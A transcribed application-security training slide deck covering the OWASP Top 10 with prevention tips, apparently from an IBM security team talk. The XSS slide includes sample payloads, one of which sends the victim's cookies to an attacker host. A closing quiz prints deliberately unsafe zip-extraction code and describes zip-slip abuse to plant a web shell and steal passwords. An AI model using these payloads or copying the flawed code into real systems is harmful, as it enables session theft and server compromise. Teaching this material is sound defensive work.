Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Similar documents
Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Web Application Security. Philippe Bogaerts

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

1 About Web Security. What is application security? So what can happen? see [?]

C1: Define Security Requirements

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Application vulnerabilities and defences

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Copyright

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14


OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Sichere Software vom Java-Entwickler

Aguascalientes Local Chapter. Kickoff

Your Turn to Hack the OWASP Top 10!

CIS 4360 Secure Computer Systems XSS

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

TIBCO Cloud Integration Security Overview

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Web Application Vulnerabilities: OWASP Top 10 Revisited

OWASP TOP 10. By: Ilia

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

Welcome to the OWASP TOP 10

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Application Layer Security

Web Application Penetration Testing

COMP9321 Web Application Engineering

Authentication and Password CS166 Introduction to Computer Security 2/11/18 CS166 1

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Solutions Business Manager Web Application Security Assessment

Certified Secure Web Application Engineer

CSCD 303 Essential Computer Security Fall 2017

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

CSCE 813 Internet Security Case Study II: XSS

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Featuring. and. Göteborg. Ulf Larson Thursday, October 24, 13

Certified Secure Web Application Security Test Checklist

Web Application Whitepaper

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

OWASP Top David Caissy OWASP Los Angeles Chapter July 2017

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

CSCD 303 Essential Computer Security Fall 2018

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

CNIT 129S: Securing Web Applications. Ch 8: Attacking Access Controls

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Security Course. WebGoat Lab sessions

Test Harness for Web Application Attacks

DreamFactory Security Guide

Web basics: HTTP cookies

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

Kishin Fatnani. Founder & Director K-Secure. Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009

CSWAE Certified Secure Web Application Engineer

Secure Development Guide

Security Engineering by Ross Andersson Chapter 18. API Security. Presented by: Uri Ariel Nepomniashchy 31/05/2016

Chrome Extension Security Architecture

Bank Infrastructure - Video - 1

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

Information Security. Gabriel Lawrence Director, IT Security UCSD

SECURITY TESTING. Towards a safer web world

Top 10 Web Application Vulnerabilities

eb Security Software Studio

COMP9321 Web Application Engineering

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

WEB SECURITY: XSS & CSRF

Exploiting and Defending: Common Web Application Vulnerabilities

Web Security, Summer Term 2012

NET 311 INFORMATION SECURITY

Why bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?

Securing Your Web Application against security vulnerabilities. Alvin Wong, Brand Manager IBM Rational Software

Web Security. Web Programming.

RKN 2015 Application Layer Short Summary

OPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

WEB APPLICATION SCANNERS. Evaluating Past the Base Case

Combating Common Web App Authentication Threats

GOING WHERE NO WAFS HAVE GONE BEFORE

CS 161 Computer Security

Web Security Computer Security Peter Reiher December 9, 2014

F5 Application Security. Radovan Gibala Field Systems Engineer

Securing ArcGIS Services

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

Web Application Security

Non conventional attacks Some things your security scanner won t find OWASP 23/05/2011. The OWASP Foundation.

Web Attacks CMSC 414. September 25 & 27, 2017

Applications Security

How to Configure Authentication and Access Control (AAA)

SAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0

Transcription:

Application Security Introduction Tara Gu IBM Product Security Incident Response Team

About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering - Google Cloud Bigtable Intern Summer 2015-1 year at IBM Product Security Incident Response Team

Introduction to Application Security - Application security encompasses measures taken throughout the code's life-cycle to prevent gaps in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance or database of the application - The Open Web Application Security Project (OWASP) is a not-for-profit charitable organization focused on improving the security of software - OWASP Top 10 Vulnerabilities - History of attacks: The PC didn't have usernames and passwords built into its design, and the Internet allowed packets that weren't authenticated They took advantage of misconfigurations and exploited programming vulnerabilities such as buffer overflows and parsing errors to gain access to the mainframes and servers

OWASP Top 10 #1 Injection - Types: SQL injection, code injection, OS command, LDAP injection, buffer overflow - Untrusted requests/commands executed in webapp - Most common: SQL Injection - Prevention - Use a vetted library or framework - Use a parameterized API - Run the application with minimum privileges - Escape all special characters used by an interpreter - White list only allowed chars - Demo: http://demo.testfire.net/bank/login.aspx

OWASP Top 10 #2 Broken Authentication and Session Management - A vulnerability that allows the capture or bypass of authentication methods used to protect against unauthorized access - Steps that are performed when logging into a web application - User provides login credentials: username and password - This information is submitted to the application and a session ID is generated which is linked to the credentials - Ways a webapp can fail to project the username, pwd, and session id - Unencrypted connections - Predictable login credentials - Session value does not timeout or does not get invalidated after logout - User authentication credentials are not protected when stored - Session IDs are in the url - Demo: charles

OWASP Top 10 #3 Cross-Site Scripting (XSS) - An attacker can inject untrusted snippets of javascript into your app without validation - This javascript is then executed by the victim who is visiting the target site - 3 main types: - Reflected XSS: An attacker sends the victim a link to the target app through email, social media, etc. This link has a script embedded within it which executed when visiting the target site - Persistent/stored XSS: An attacker is able to plant a persisted script in the target website which will execute when anyone visits it (example: https://www.youtube.com/watch?v=jx_k3pkjflm ) - DOM-based XSS: No HTTP request required, the script is injected as a result of modifying the DOM of the target site in the client side code in the victim s browser and is then executed

OWASP Top 10 #3 Cross-Site Scripting (XSS) - Demo: http://demo.testfire.net/bank/apply.aspx only works on firefox, not chrome - <script>alert(123)</script> - <script>window.location="http://bringvictory.com/";</script> - <script>location.href='http://evilserver.com:9999/'+documents.cookie</script> - Prevention: - Use vetted library or framework - Encoding non-alphanumeric characters - Use HttpOnly attribute in a cookie - Helps user s cookie to be protected from being accessible to malicious client side scripts that use document.cookies - Input validation

OWASP Top 10 #4 Insecure Direct Object Reference - What is a direct object reference? Application performs actions through user supplied parameters (e.g. loading a file). The parameters may be used internally within the app in ways the developer didn t anticipate, giving attackers access to sensitive parts of the app - Demo: http://demo.testfire.net/default.aspx?content=business_deposit.htm - Prevention: - Create a map within your code that maps objects that could be referenced internally to aliased terms which are exposed to the user. For example, an array of primary keys to a particular table might be mapped to a random int. When the value is submitted by the user, the int is then matched to the real value - prevents disclosure of the actual value, limits what the user can alter - Values supplied by the user should be vetted through an access control function

OWASP Top 10 #5 Security Misconfiguration - Improper server or webapp config: debugger enabled, incorrect directory permissions, using default accounts/pwds, setup/config pages enabled - The principle of least privilege: everything off my default

OWASP Top 10 #6 Sensitive Data Exposure - Stolen banking (account number), health, personal (SSN) information, username/pw - Insufficient transport layer protection data intercepted - Https connections are not always trustworthy - Browser checks the server identity by checking the SSL certificate - Certificate signed up an unrecognized authority or self-signed, the certificate has expired, the name of the site and the name of the reported certificate do not match (from a different domain) - Or, you may not be connected to the real Altoro Mutual - Or the connection is going through a proxy and someone might listen to your network communications - Demo: http://demo.testfire.net/bank/login.aspx

OWASP Top 10 #7 Missing Function Level Access Control - User can directly browse to a resource - Solely rely on user supplied input - Example: regular user browses to the admin page - Prevention: - Application needs to verify the request at the UI level as well as backend - Deny access to functionality by default - Use access control lists and role based authentication

OWASP Top 10 #8 Cross-Site Request Forgery (CSRF) - Makes it possible for an attacker to force a user to unknowingly perform actions - Common targets: social media, banking, online shipping - Users unaware that malicious actions being performed - Example: embarrassing social media post; money stolen from your bank online account - Logged into your bank visit a page that contains a CSRF attack (automatic request planted) and a request is performed to transfer money to another account - The user must be logged in to the legitimate website at the time he or she is tricked into visiting the malicious website - Difference between XSS and CSRF? - Prevention: - The server should not process requests other than request it generates itself - Unique token tied to user s session (if no token present, no action will be performed)

OWASP Top 10 #9 Using Components with Known Vulnerabilities

OWASP Top 10 #10 Unvalidated Redirects and Forwards - Redirect a user to an untrusted site when the user visits a link located on a trusted website e.g redirect after successful authentication - The redirection is in the login form or the url both can be tampered with by the user - Redirect based on user supplied parameter input - Prevention: - Avoid using redirect using user parameters - Verify target url - Or use a map: url name (index.html homepage)

public final void unzip(string filename) throws java.io.ioexception { FileInputStream fis = new FileInputStream(filename); ZipInputStream zis = new ZipInputStream(new BufferedInputStream(fis)); ZipEntry entry; byte data[] = new byte[buffsize]; BufferedOutputStream dest = null; String name = null; try { while ((entry = zis.getnextentry())!= null) { name = entry.getname(); if (entry.isdirectory()) { new File(name).mkdirs(); continue; } FileOutputStream fos = new FileOutputStream(name); dest = new BufferedOutputStream(fos, BUFFSIZE); int count = zis.read(data, 0, BUFFSIZE); while (count!= -1) { dest.write(data, 0, count); count = zis.read(data, 0, BUFFSIZE); } dest.flush(); dest.close(); dest = null; } zis.closeentry(); } } if (dest!= null) { dest.flush(); dest.close(); dest = null; } zis.close(); fis.close();

Answer - Doesn t meter the amount of data being written to disk - Doesn t track the number of files being written to disk, even if there were 5 billion tiny files inside, consuming all inodes (Linux) or entries in the file system (max of 4,294,967,295 files for NTFS). - Doesn t check where the files are going on disk, even if to useful places like:../../../../../etc/passwd to set a root password *I* like../../theapp/admin/login.jsp to add a little AJAX that sends me a copy of every username and password../../theapp/images/jpg/k/down/here/nobody/sees/me/hack/pwnshell.jsp to create a shell prompt so I can execute any OS commands allowed by the userid that is running the app server. I hope it is running with root. If not, I can possibly change that since the app server ID owns its config files

Reference - http://www-03.ibm.com/security/ - https://www.youtube.com/channel/uclagzm2oxfpx8womsopwoxa

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback